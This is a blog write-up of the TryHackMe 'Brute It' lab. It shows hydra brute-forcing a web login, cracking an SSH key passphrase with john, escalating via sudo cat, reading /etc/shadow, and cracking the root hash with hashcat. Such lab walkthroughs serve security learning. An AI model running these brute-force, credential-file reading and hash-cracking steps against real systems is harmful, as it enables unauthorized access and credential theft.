Skip to content
All posts
Security

TryHackMe: Brute It

March 13, 2021·Read on Medium·

Having fun with TryHackMe again. So, here is the write up and guideline to pass this Brute It challenge.

Room: https://tryhackme.com/room/bruteit
Level: Easy

Task: Learn how to brute, hash cracking and escalate privileges in this box!

Lets get started

As usual, open the IP in browser first. There is nothing hidden here.

Brute the available directory then,

# gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.10.98.X -t 60
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/admin (Status: 301)

Ok found the admin path, so go the page…..

Ok now, there is a admin page with login. Inspect the webpage first

There is a message there saying the username is “admin”. Before using hydra, I need to capture the error message first and its “Username or password invalid”. So using hydra, brute the password using rockyou.txt dictionary with POST method.

# hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.98.X http-post-form "/admin/:user=admin&pass=^PASS^:Username or password invalid"
...
[80][http-post-form] host: 10.10.98.99 login: admin password: XXXXXX
...

Found the password! Lets login.

There is a flag there. Ok now, there is a page headed to RSA private key

Just download it. It might be use for SSH login. To complete the task, I need to crack the paraphrase first. Using john the ripper,

# python ssh2john.py ~/Downloads/id_rsa > ~/Downloads/id_rsa.hash
# john ~/Downloads/id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
...
XXXXXXXXXX       (/home/kapalbiru/Downloads/id_rsa)
...

Ok now, the paraphrase is found! Lets hunt for the user flag

So now, from the id_rsa, need to generate the public key first. Change the id_rsa permission first

# chmod 400 id_rsa
# ssh-keygen -y -f id_rsa > id_rsa.pub
Enter passphrase: XXXXXXXXXX
# ls -al 
-r--------  1 kapalbiru kapalbiru   1766 Mar  6 00:07 id_rsa
-rw-r--r--  1 kapalbiru kapalbiru    381 Mar  6 00:37 id_rsa.pub

Lets try the SSH using username “john”

# ssh john@10.10.98.99 -i id_rsa      
Enter passphrase for key 'id_rsa': 
....
....
john@bruteit:~$

Ok now find the user flag.

# ls
user.txt
# cat user.txt 
THM{a_password_XX_XX_X_XXXXXX}

Found the user flag! Root all the way then~~

First thing, find if any cron running

# crontab -e
# cat /etc/crontab

There is no cron available. So, lets see what is allowed by the invoking user

# sudo -l
...
User john may run the following commands on bruteit:
    (root) NOPASSWD: /bin/cat

Oh! if you using cat command there is no need for password. Lets see GTFObins for cat command

Ok now, easy access all the way then using cat

# sudo cat /root/root.txt
THM{pr1v1l3g3_3sXXXXXXXX}

Found the root flag! Now the last one is to find the root password. Check the shadow file

# sudo cat /etc/shadow
root:$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.:18490:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
sys:*:18295:0:99999:7:::
sync:*:18295:0:99999:7:::
games:*:18295:0:99999:7:::
man:*:18295:0:99999:7:::
lp:*:18295:0:99999:7:::
mail:*:18295:0:99999:7:::
news:*:18295:0:99999:7:::
uucp:*:18295:0:99999:7:::
proxy:*:18295:0:99999:7:::
www-data:*:18295:0:99999:7:::
backup:*:18295:0:99999:7:::
list:*:18295:0:99999:7:::
irc:*:18295:0:99999:7:::
gnats:*:18295:0:99999:7:::
nobody:*:18295:0:99999:7:::
systemd-network:*:18295:0:99999:7:::
systemd-resolve:*:18295:0:99999:7:::
syslog:*:18295:0:99999:7:::
messagebus:*:18295:0:99999:7:::
_apt:*:18295:0:99999:7:::
lxd:*:18295:0:99999:7:::
uuidd:*:18295:0:99999:7:::
dnsmasq:*:18295:0:99999:7:::
landscape:*:18295:0:99999:7:::
pollinate:*:18295:0:99999:7:::
thm:$6$hAlc6HXuBJHNjKzc$NPo/0/iuwh3.86PgaO97jTJJ/hmb0nPj8S/V6lZDsjUeszxFVZvuHsfcirm4zZ11IUqcoB9IEWYiCV.wcuzIZ.:18489:0:99999:7:::
sshd:*:18489:0:99999:7:::
john:$6$iODd0YaH$BA2G28eil/ZUZAV5uNaiNPE0Pa6XHWUFp7uNTp2mooxwa4UzhfC0kjpzPimy1slPNm9r/9soRw8KqrSgfDPfI0:18490:0:99999:7:::

There is 3 user that have password hashes. Just focus on root. Lets crack it. Using hash identifier its unable to detect. This looks like 256crypt or 512crypt.

# hashcat -m 1800 hash.txt ~/wordlists/rockyou.txt --force
...
...
$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.:XXXXXXXXX
...
...

Tada! Complete all the task!

Found this helpful?

If this article saved you time or solved a problem, consider supporting — it helps keep the writing going.

☕ Buy me a coffeePayPal

Originally published on Medium.

View on Medium
TryHackMe: Brute It — Hafiq Iqmal — Hafiq Iqmal